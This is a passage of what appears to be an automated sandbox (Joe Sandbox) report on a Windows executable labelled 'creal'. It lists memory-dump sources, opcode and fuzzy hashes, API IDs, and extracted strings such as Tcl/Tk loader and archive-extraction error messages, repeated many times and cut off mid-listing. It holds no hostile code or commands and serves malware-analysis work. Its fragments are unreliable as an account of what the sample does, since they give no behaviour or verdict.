                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                • Instruction ID: 50526d8a9866b1caae2769776b3f2f6c6ec0b6801f14bf1b2a63fb0a34b787ff
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EC10373B2928687EB24CF19A04866BB7A1F794B84F459135DB5E87B94DF3DE800CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                • Opcode ID: 9ceb1b6cde6f3b2eda1c2fc70bd7e1e7d126a653b4f6510e73c9dfb920cedcd9
                                                                                                                                                                                                                • Instruction ID: 91ee32ee8524b306b4d27eff1ecbd371e00b9059ebcd8b51d55ff3723cfecd93
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ceb1b6cde6f3b2eda1c2fc70bd7e1e7d126a653b4f6510e73c9dfb920cedcd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4B16973621B898AEB15CF29C8463693BA0F784FA8F188961DA5DC37B4CF79D451D700
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                • Opcode ID: c4872f1e0598d0dbbdaab36ff9640d642bec52225eb732dc17c9982f250c6bea
                                                                                                                                                                                                                • Instruction ID: 7e0497e6ed9f381ebcc28ac6d9da55acdebc2f5f2ddef27ef737da3c52b5497b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4872f1e0598d0dbbdaab36ff9640d642bec52225eb732dc17c9982f250c6bea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61E1A173A28A4686EBAC8E25C15053E2BA0FF45F48F145175DA0F877B4DF39E852E740
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                • Opcode ID: dcea56467776434e5e52420c9f77f7819282e5f197dea1188040280776680b59
                                                                                                                                                                                                                • Instruction ID: f45ebac3a6dc599cb700e2c3761a905faff2c2f41b37fe4bdced61c257b04dc5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcea56467776434e5e52420c9f77f7819282e5f197dea1188040280776680b59
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551577BB282C587E7258A35D80477AAB91E744F94F888271CBAC87AE5DF3DD044D700
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                • Opcode ID: 97f539a7fe7fc551e0c66836eb46f4a9937a07ec542780b0bb5d867a01fb23bb
                                                                                                                                                                                                                • Instruction ID: d280b50e9dded92fc824490446cdca00b2d47525a72da95aa44a70b0c5c774f5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f539a7fe7fc551e0c66836eb46f4a9937a07ec542780b0bb5d867a01fb23bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8502C1B3B3D65681FA65EF11981027B2A84AF41F90F0586B5DE6DC67F2DE3DE801A300
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e1b45cc5b539c2f4a44f5a431b63c23698d5cd8cc6c74fd81da4f2666c4fe2f5
                                                                                                                                                                                                                • Instruction ID: 6d5f69681ffc8eb2e3b3f4a60a1bbed58c291eb9fd7c53a25e45f1bdfa8f7084
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1b45cc5b539c2f4a44f5a431b63c23698d5cd8cc6c74fd81da4f2666c4fe2f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07D1C567A2864286EBAC8F25C15427F3BA0EB05F48F1446B5CE4F876B5EF39D845E340
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 84ec6a3f320757ef13b53a77f9400a9296092c401b576f7c6112a1c9e532824b
                                                                                                                                                                                                                • Instruction ID: 3f7f67664682eb69732bafca0d34f1f46e3cc787e7bc9748807efd440cf8c7e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84ec6a3f320757ef13b53a77f9400a9296092c401b576f7c6112a1c9e532824b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09C192732241E04BD2C9EB29E45957A77E1F78834DBD4443AEB8B47B89CA3CE514D710
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 4004e6f7831e6380f0c7a9c187e4f56c2fba6a50471e57e5591c0e9cd6f9eb67
                                                                                                                                                                                                                • Instruction ID: ce59c9994b5f71d833695011990374791a0f6eb99445a01e5c9b233584c0739d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4004e6f7831e6380f0c7a9c187e4f56c2fba6a50471e57e5591c0e9cd6f9eb67
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECB16F7392878589EBA98F39C45023E3FA1E74AF48F2441B5CA4E873A5CF39D451E744
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
Memory Dump Source
• Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
• Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                • Instruction ID: ab6b1a0b9969d0b93a1faecf25c69b9ced7edfa54c19356867ce980a3473c042
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE41085FD3965A04E961891C87017BA2E809F12FA2D1852F4CDBE973F3CD0D758AD112
Memory Dump Source
• Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
• Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
Similarity
• API ID: AddressProc
• String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 190572456-2208601799
                                                                                                                                                                                                                • Opcode ID: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                                                                                                                                                                • Instruction ID: 89713d98b32e699cb82e214f5ea46de6ffc36d886c6bfdb737bc86011586b99b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE1DB6BA3EB03D1FA19CF14E85057723A1AF08F40B9454B5C95E863F4EFBCB588A215
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message_fread_nolock
                                                                                                                                                                                                                • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 3065259568-2316137593
                                                                                                                                                                                                                • Opcode ID: a9099626a2381055e946f7f7aed1a8ba936185159eed76248da5dffe7bf1f363
                                                                                                                                                                                                                • Instruction ID: 98f0d49c752ed30786ca194df8621016af34360759f63cf3a24c8f31d96d5394
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9099626a2381055e946f7f7aed1a8ba936185159eed76248da5dffe7bf1f363
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D518363A3868746EA24AB21E450AFB6394EF44F84F504071EE4DC7BF5EE7CE585A700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                • Instruction ID: e1bb2eadb82e4e82d1b4ee7d0520d3e4ace6e86a4ed7499e24a48104e70065b5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951C326624BA186D6389F36E4581BBB7A1EB98B61F004125EBDE83694DF3CD085DB10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                • Opcode ID: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                                                                                                                                                                • Instruction ID: ae6cbc2ae46afe1389905dc6acca2014543bdff72d827b7ac70f99b7ae263f93
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D12E37FE2C24386FB209A14D0546BB7E61EB80F54F844575E68A876E4DF3CE480BB06
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                • Instruction ID: 3a575b4e6549feef42dbd453bded59170d2978a5b8b8bfb704dde03e3fb0fdea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F12B5E3E2D14385FB609A15E0442BFBA51FB40F54F888179E79AC66E4DF3DE480AB50
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
